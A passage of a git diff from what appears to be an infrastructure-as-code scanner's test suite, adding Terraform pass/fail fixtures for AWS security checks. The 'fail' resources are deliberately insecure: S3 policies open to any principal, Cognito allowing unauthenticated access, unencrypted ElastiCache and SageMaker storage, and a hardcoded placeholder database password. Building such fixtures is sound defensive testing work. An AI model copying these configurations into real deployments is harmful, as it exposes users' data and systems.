+        test_files_dir = Path(__file__).parent / "example_RevisionVersionTag"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "hash",
+            "sub_dir_hash",
+            "tag",
+            "shallow_clone",
+            "module_with_version"
+        }
+
+        failing_resources = {
+            "looks_like_a_branch",
+            "tf_registry_no_version",
+            "generic_git_module",
+            "bitbucket_module",
+            "github_ssh_module",
+            "github_module"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf b/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf
index 8e5da2ace1b..149b3d3bd96 100644
--- a/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf
+++ b/tests/terraform/checks/resource/aws/example_APIGatewayMethodSettingsCacheEncrypted/main.tf
@@ -4,7 +4,7 @@ resource "aws_api_gateway_method_settings" "fail" {
   method_path = "path1/GET"
 
   settings {
-    caching_enabled      = false
+    caching_enabled      = true
     metrics_enabled      = false
     logging_level        = "INFO"
     cache_data_encrypted = false
@@ -25,3 +25,15 @@ resource "aws_api_gateway_method_settings" "pass" {
     data_trace_enabled   = false
   }
 }
+
+resource "aws_api_gateway_method_settings" "pass2" {
+  rest_api_id = aws_api_gateway_rest_api.fail.id
+  stage_name  = aws_api_gateway_stage.fail.stage_name
+  method_path = "path1/GET"
+
+  settings {
+    metrics_enabled      = false
+    logging_level        = "INFO"
+    data_trace_enabled   = false
+  }
+}
diff --git a/tests/terraform/checks/resource/aws/example_BedrockAgentEncrypted/main.tf b/tests/terraform/checks/resource/aws/example_BedrockAgentEncrypted/main.tf
new file mode 100644
index 00000000000..f12adfa7520
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_BedrockAgentEncrypted/main.tf
@@ -0,0 +1,10 @@
+# fail
+resource "aws_bedrockagent_agent" "bedrock_agent" {
+  agent_name = "example_agent_name"
+}
+
+# pass
+resource "aws_bedrockagent_agent" "bedrock_agent_with_kms_key" {
+  agent_name                  = "example_agent_name"
+  customer_encryption_key_arn = aws_kms_key.example.arn
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf
new file mode 100644
index 00000000000..ab3e808e7ad
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf
@@ -0,0 +1,7 @@
+resource "aws_cognito_identity_pool" "pass" {
+  allow_unauthenticated_identities = false
+}
+
+resource "aws_cognito_identity_pool" "fail" {
+  allow_unauthenticated_identities = true
+}
diff --git a/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf
new file mode 100644
index 00000000000..b5be01b1b90
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf
@@ -0,0 +1,53 @@
+resource "aws_elasticache_replication_group" "pass" {
+  automatic_failover_enabled    = true
+  replication_group_id          = "tf-rep-group-1"
+  node_type                     = "cache.m4.large"
+  parameter_group_name          = "default.redis3.2"
+  port                          = 6379
+  at_rest_encryption_enabled    = true
+  transit_encryption_enabled    = true
+  auth_token                    = var.auth_token
+}
+
+resource "aws_elasticache_replication_group" "pass2" {
+  replication_group_id = local.replication_group_id
+  description = "Sample Redis replication group"
+  engine = "redis"
+  transit_encryption_enabled = true
+  user_group_ids = [
+    "sample-group-id"
+  ]
+}
+
+resource "aws_elasticache_replication_group" "fail" {
+  automatic_failover_enabled    = true
+  replication_group_id          = "tf-rep-group-2"
+  node_type                     = "cache.m4.large"
+  parameter_group_name          = "default.redis3.2"
+  port                          = 6379
+  at_rest_encryption_enabled    = false
+  transit_encryption_enabled    = false
+}
+
+resource "aws_elasticache_replication_group" "fail2" {
+  automatic_failover_enabled    = true
+  replication_group_id          = "tf-rep-group-2"
+  node_type                     = "cache.m4.large"
+  parameter_group_name          = "default.redis3.2"
+  port                          = 6379
+  at_rest_encryption_enabled    = false
+  transit_encryption_enabled    = false
+  user_group_ids = [
+    "sample-group-id"
+  ]
+}
+
+resource "aws_elasticache_replication_group" "fail3" {
+  automatic_failover_enabled    = true
+  replication_group_id          = "tf-rep-group-2"
+  node_type                     = "cache.m4.large"
+  parameter_group_name          = "default.redis3.2"
+  port                          = 6379
+  at_rest_encryption_enabled    = false
+  transit_encryption_enabled    = true
+}
diff --git a/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf b/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf
index c88e110503e..eafe4a2e0da 100644
--- a/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf
+++ b/tests/terraform/checks/resource/aws/example_LaunchConfigurationEBSEncryption/main.tf
@@ -64,7 +64,7 @@ resource "aws_instance" "fail_empty_root_list" {
   root_block_device = var.empty_list
 }
 
-resource "aws_instance" "fail_empty_ebs_list" {
+resource "aws_instance" "unknown_empty_ebs_list" {
   image_id      = "ami-123"
   instance_type = "t2.micro"
 
diff --git a/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf b/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf
index 55144481361..bf3ccb3a2f4 100644
--- a/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf
+++ b/tests/terraform/checks/resource/aws/example_RDSInstancePerformanceInsights/main.tf
@@ -60,4 +60,37 @@ resource "aws_rds_cluster_instance" "pass" {
   engine                       = aws_rds_cluster.default.engine
   engine_version               = aws_rds_cluster.default.engine_version
   performance_insights_enabled = true
-}
\ No newline at end of file
+}
+
+resource "aws_db_instance" "unknown_engine_class_combo" {
+  allocated_storage    = 20
+  storage_type         = "gp2"
+  engine               = "mariadb"
+  engine_version       = "10.5"
+  instance_class       = "db.t3.micro"
+  name                 = "mydatabase"
+  username             = "admin"
+  password             = "yourpassword" # Use a more secure method for production
+  parameter_group_name = "default.mariadb10.5"
+  skip_final_snapshot  = true
+
+  tags = {
+    Name = "MyMariaDBInstance"
+  }
+}
+
+resource "aws_rds_cluster_instance" "unknown_engine_defaultclass_combo" {
+  identifier         = "aurora-cluster-demo-${count.index}"
+  cluster_identifier = aws_rds_cluster.default.id
+  instance_class     = "db.t2.small"
+  engine             = aws_rds_cluster.default.engine
+  engine_version     = aws_rds_cluster.default.engine_version
+}
+
+resource "aws_rds_cluster_instance" "unknown_engine_class_combo" {
+  identifier         = "aurora-cluster-demo-${count.index}"
+  cluster_identifier = aws_rds_cluster.default.id
+  instance_class     = "db.t2.small"
+  engine             = "mysql"
+  engine_version     = aws_rds_cluster.default.engine_version
+}
diff --git a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf
index ed0013d67f4..93ecbef2331 100644
--- a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf
+++ b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf
@@ -183,3 +183,304 @@ data "aws_iam_policy_document" "test" {
     resources = ["${aws_s3_bucket.b.arn}/*"]
   }
 }
+
+
+resource "aws_s3_bucket_policy" "pass_w_condition" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Condition": {
+              "ArnNotEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::12345555555555:user/username"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket" "pass_w_condition" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Condition": {
+              "ArnNotEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::12345555555555:user/username"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+# BAD:
+resource "aws_s3_bucket_policy" "pass_w_condition2" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Condition": {
+              "ArnEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::12345555555555:user/username"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket" "pass_w_condition2" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Condition": {
+              "ArnEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::12345555555555:user/username"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket_policy" "fail_w_condition" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Condition": {
+              "ArnEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::*"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket" "fail_w_condition" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Condition": {
+              "ArnEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::*"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket_policy" "fail_w_condition" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Condition": {
+              "ArnEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::*"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket" "pass_w_condition3" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+    "Id": "Policy1597273448050",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Stmt1597273446725",
+            "Action": [
+                "s3:GetObject"
+            ],
+            "Effect": "Allow",
+            "Resource": "arn:aws:s3:::bucket/*",
+            "Principal": "*",
+            "Condition": {
+              "ArnEquals": {
+                "aws:PrincipalArn": "arn:aws:iam::12345555555555:user/username"
+              }
+            }
+        }
+    ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket" "pass_w_condition4" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "AllowAccessFromSpecificVpcEndpoint",
+      "Effect": "Allow",
+      "Principal": "*",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::your-bucket-name/*",
+      "Condition": {
+        "StringEquals": {
+          "aws:sourceVpce": "vpce-123abc456def7890g"
+        }
+      }
+    }
+  ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket" "pass_w_condition5" {
+  bucket = "bucket"
+
+  policy = <<POLICY
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "AllowAccessFromSpecificVpcEndpoint",
+      "Effect": "Allow",
+      "Principal": "*",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::your-bucket-name/*",
+      "Condition": {"ArnLike": {"aws:SourceArn": "arn:aws:cloudtrail:*:111122223333:trail/*"}}
+    }
+  ]
+}
+POLICY
+}
+
+resource "aws_s3_bucket" "pass_w_condition6" {
+  bucket = aws_s3_bucket.example_bucket.id
+
+  policy = <<POLICY
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "AllowAccessFromSpecificVpcEndpoint",
+      "Effect": "Allow",
+      "Principal": "*",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::your-bucket-name/*",
+      "Condition": {
+          "StringLike": {
+            "aws:PrincipalOrgPath": "arn:aws:organizations::*:organization/123456789012*",
+            "aws:userid": "AROAEXAMPLE1234567890123456789"
+          }
+        }
+    }
+  ]
+}
+POLICY
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SSMParameterUsesCMK/main.tf b/tests/terraform/checks/resource/aws/example_SSMParameterUsesCMK/main.tf
index 9de748551b8..106cf9f7bf9 100644
--- a/tests/terraform/checks/resource/aws/example_SSMParameterUsesCMK/main.tf
+++ b/tests/terraform/checks/resource/aws/example_SSMParameterUsesCMK/main.tf
@@ -16,6 +16,17 @@ resource "aws_ssm_parameter" "pass" {
   value       = var.database_master_password
   key_id      = aws_kms_key.pike.arn
 
+  tags = {
+    environment = "production"
+  }
+}
+
+resource "aws_ssm_parameter" "pass2" {
+  name        = "/production/database/password/master"
+  description = "The parameter description"
+  type        = "String"
+  value       = var.database_master_password
+
   tags = {
     environment = "production"
   }
diff --git a/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/main.tf b/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/main.tf
new file mode 100644
index 00000000000..ddca722c217
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionEncryption/main.tf
@@ -0,0 +1,93 @@
+resource "aws_iam_role" "MySageMakerRole" {
+  name               = "MySageMakerRole"
+  assume_role_policy = jsonencode({
+    Version   = "2012-10-17"
+    Statement = [{
+      Effect    = "Allow"
+      Principal = {
+        Service = "sagemaker.amazonaws.com"
+      }
+      Action    = "sts:AssumeRole"
+    }]
+  })
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_pass" {
+  job_definition_name = "MyDataQualityJob"
+  role_arn            = aws_iam_role.MySageMakerRole.arn
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "my-endpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-sagemaker-bucket/output"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "Continuous"
+      }
+    }
+  }
+
+  job_resources {
+    cluster_config {
+      instance_count  = 1
+      instance_type   = "ml.m5.xlarge"
+      volume_size_in_gb = 20
+      volume_kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+    }
+  }
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_fail" {
+  job_definition_name = "MyDataQualityJob"
+  role_arn            = aws_iam_role.MySageMakerRole.arn
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "my-endpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-sagemaker-bucket/output"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "Continuous"
+      }
+    }
+  }
+
+  job_resources {
+    cluster_config {
+      instance_count  = 1
+      instance_type   = "ml.m5.xlarge"
+      volume_size_in_gb = 20
+      volume_kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+    }
+  }
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/main.tf b/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/main.tf
new file mode 100644
index 00000000000..ec66bbd3f8a
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionTrafficEncryption/main.tf
@@ -0,0 +1,116 @@
+provider "aws" {
+  region = "us-west-2"
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_pass" {
+  job_definition_name = "MyDataQualityJobDefinition"
+
+  data_quality_baseline_config {
+    baselining_job_name = "MyBaselineJob"
+  }
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "MyEndpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-bucket/output/"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "EndOfJob"
+      }
+    }
+  }
+
+  role_arn = "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+
+  network_config {
+    enable_inter_container_traffic_encryption = true
+  }
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_fail_1" {
+  job_definition_name = "MyDataQualityJobDefinition"
+
+  data_quality_baseline_config {
+    baselining_job_name = "MyBaselineJob"
+  }
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "MyEndpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-bucket/output/"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "EndOfJob"
+      }
+    }
+  }
+
+  role_arn = "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+
+  network_config {
+    enable_inter_container_traffic_encryption = false
+  }
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_fail_2" {
+  job_definition_name = "MyDataQualityJobDefinition"
+
+  data_quality_baseline_config {
+    baselining_job_name = "MyBaselineJob"
+  }
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-custom-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "MyEndpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-bucket/output/"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "EndOfJob"
+      }
+    }
+  }
+
+  role_arn = "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-20200601T123456"
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/main.tf b/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/main.tf
new file mode 100644
index 00000000000..d292c63cc33
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_SagemakerDataQualityJobDefinitionVolumeEncryption/main.tf
@@ -0,0 +1,126 @@
+resource "aws_iam_role" "MySageMakerRole" {
+  name               = "MySageMakerRole"
+  assume_role_policy = jsonencode({
+    Version   = "2012-10-17"
+    Statement = [{
+      Effect    = "Allow"
+      Principal = {
+        Service = "sagemaker.amazonaws.com"
+      }
+      Action    = "sts:AssumeRole"
+    }]
+  })
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_pass" {
+  job_definition_name = "MyDataQualityJob"
+  role_arn            = aws_iam_role.MySageMakerRole.arn
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "my-endpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-sagemaker-bucket/output"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "Continuous"
+      }
+    }
+  }
+
+  job_resources {
+    cluster_config {
+      instance_count    = 1
+      instance_type     = "ml.m5.xlarge"
+      volume_size_in_gb = 20
+      volume_kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/my-existing-volume-kms-key-id"
+    }
+  }
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_fail_1" {
+  job_definition_name = "MyDataQualityJob"
+  role_arn            = aws_iam_role.MySageMakerRole.arn
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "my-endpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-sagemaker-bucket/output"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "Continuous"
+      }
+    }
+  }
+
+  job_resources {
+    cluster_config {
+      instance_count    = 1
+      instance_type     = "ml.m5.xlarge"
+      volume_size_in_gb = 20
+    }
+  }
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
+
+resource "aws_sagemaker_data_quality_job_definition" "data_quality_job_fail_2" {
+  job_definition_name = "MyDataQualityJob"
+  role_arn            = aws_iam_role.MySageMakerRole.arn
+
+  data_quality_app_specification {
+    image_uri = "123456789012.dkr.ecr.us-west-2.amazonaws.com/my-image:latest"
+  }
+
+  data_quality_job_input {
+    endpoint_input {
+      endpoint_name = "my-endpoint"
+      local_path    = "/opt/ml/processing/input"
+    }
+  }
+
+  data_quality_job_output_config {
+    kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/my-existing-kms-key-id"
+
+    monitoring_outputs {
+      s3_output {
+        s3_uri        = "s3://my-sagemaker-bucket/output"
+        local_path    = "/opt/ml/processing/output"
+        s3_upload_mode = "Continuous"
+      }
+    }
+  }
+
+  stopping_condition {
+    max_runtime_in_seconds = 3600
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SagemakerDomainEncryptedWithCMK/aws_sagemaker_notebook_instance.tf b/tests/terraform/checks/resource/aws/example_SagemakerDomainEncryptedWithCMK/aws_sagemaker_notebook_instance.tf
new file mode 100644
index 00000000000..d4a962d304d
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_SagemakerDomainEncryptedWithCMK/aws_sagemaker_notebook_instance.tf
@@ -0,0 +1,22 @@
+resource "aws_sagemaker_notebook_instance" "pass" {
+  name                    = "my-notebook-instance"
+  role_arn                = aws_iam_role.role.arn
+  instance_type           = "ml.t2.medium"
+  default_code_repository = aws_sagemaker_code_repository.example.code_repository_name
+  kms_key_id = aws_kms_key.test.arn
+
+  tags = {
+    Name = "foo"
+  }
+}
+
+resource "aws_sagemaker_notebook_instance" "fail" {
+  name                    = "my-notebook-instance"
+  role_arn                = aws_iam_role.role.arn
+  instance_type           = "ml.t2.medium"
+  default_code_repository = aws_sagemaker_code_repository.example.code_repository_name
+
+  tags = {
+    Name = "foo"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SagemakerFlowDefinitionUsesKMS/main.tf b/tests/terraform/checks/resource/aws/example_SagemakerFlowDefinitionUsesKMS/main.tf
new file mode 100644
index 00000000000..5ef21dad427
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_SagemakerFlowDefinitionUsesKMS/main.tf
@@ -0,0 +1,36 @@
+resource "aws_sagemaker_flow_definition" "flow_pass" {
+  flow_definition_name = "example"
+  role_arn             = aws_iam_role.example.arn
+
+  human_loop_config {
+    human_task_ui_arn                     = aws_sagemaker_human_task_ui.example.arn
+    task_availability_lifetime_in_seconds = 1
+    task_count                            = 1
+    task_description                      = "example"
+    task_title                            = "example"
+    workteam_arn                          = aws_sagemaker_workteam.example.arn
+  }
+
+  output_config {
+    kms_key_id = "abc"
+    s3_output_path = "s3://${aws_s3_bucket.example.bucket}/"
+  }
+}
+
+resource "aws_sagemaker_flow_definition" "flow_fail" {
+  flow_definition_name = "example"
+  role_arn             = aws_iam_role.example.arn
+
+  human_loop_config {
+    human_task_ui_arn                     = aws_sagemaker_human_task_ui.example.arn
+    task_availability_lifetime_in_seconds = 1
+    task_count                            = 1
+    task_description                      = "example"
+    task_title                            = "example"
+    workteam_arn                          = aws_sagemaker_workteam.example.arn
+  }
+
+  output_config {
+    s3_output_path = "s3://${aws_s3_bucket.example.bucket}/"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/main.tf b/tests/terraform/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/main.tf
new file mode 100644
index 00000000000..0272ed62585
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_SagemakerModelWithNetworkIsolation/main.tf
@@ -0,0 +1,47 @@
+resource "aws_sagemaker_model" "model_pass" {
+  name               = "my-model"
+  execution_role_arn = aws_iam_role.example.arn
+
+  primary_container {
+    image = data.aws_sagemaker_prebuilt_ecr_image.test.registry_path
+  }
+  enable_network_isolation = true
+}
+
+resource "aws_sagemaker_model" "model_fail_1" {
+  name               = "my-model"
+  execution_role_arn = aws_iam_role.example.arn
+
+  primary_container {
+    image = data.aws_sagemaker_prebuilt_ecr_image.test.registry_path
+  }
+  enable_network_isolation = false
+}
+
+resource "aws_sagemaker_model" "model_fail_2" {
+  name               = "my-model"
+  execution_role_arn = aws_iam_role.example.arn
+
+  primary_container {
+    image = data.aws_sagemaker_prebuilt_ecr_image.test.registry_path
+  }
+}
+
+resource "aws_iam_role" "example" {
+  assume_role_policy = data.aws_iam_policy_document.assume_role.json
+}
+
+data "aws_iam_policy_document" "assume_role" {
+  statement {
+    actions = ["sts:AssumeRole"]
+
+    principals {
+      type        = "Service"
+      identifiers = ["sagemaker.amazonaws.com"]
+    }
+  }
+}
+
+data "aws_sagemaker_prebuilt_ecr_image" "test" {
+  repository_name = "kmeans"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/main.tf b/tests/terraform/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/main.tf
new file mode 100644
index 00000000000..603559f8bac
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/example_SagemakerNotebookInstanceAllowsIMDSv2/main.tf
@@ -0,0 +1,65 @@
+provider "aws" {
+  region = "us-west-2"
+}
+
+resource "aws_iam_role" "sagemaker_execution_role" {
+  name = "sagemaker-execution-role"
+
+  assume_role_policy = jsonencode({
+    Version = "2012-10-17",
+    Statement = [
+      {
+        Effect = "Allow",
+        Principal = {
+          Service = "sagemaker.amazonaws.com"
+        },
+        Action = "sts:AssumeRole"
+      }
+    ]
+  })
+}
+
+resource "aws_iam_role_policy" "sagemaker_execution_policy" {
+  role = aws_iam_role.sagemaker_execution_role.id
+
+  policy = jsonencode({
+    Version = "2012-10-17",
+    Statement = [
+      {
+        Effect = "Allow",
+        Action = [
+          "s3:ListBucket",
+          "s3:GetObject",
+          "s3:PutObject"
+        ],
+        Resource = "*"
+      }
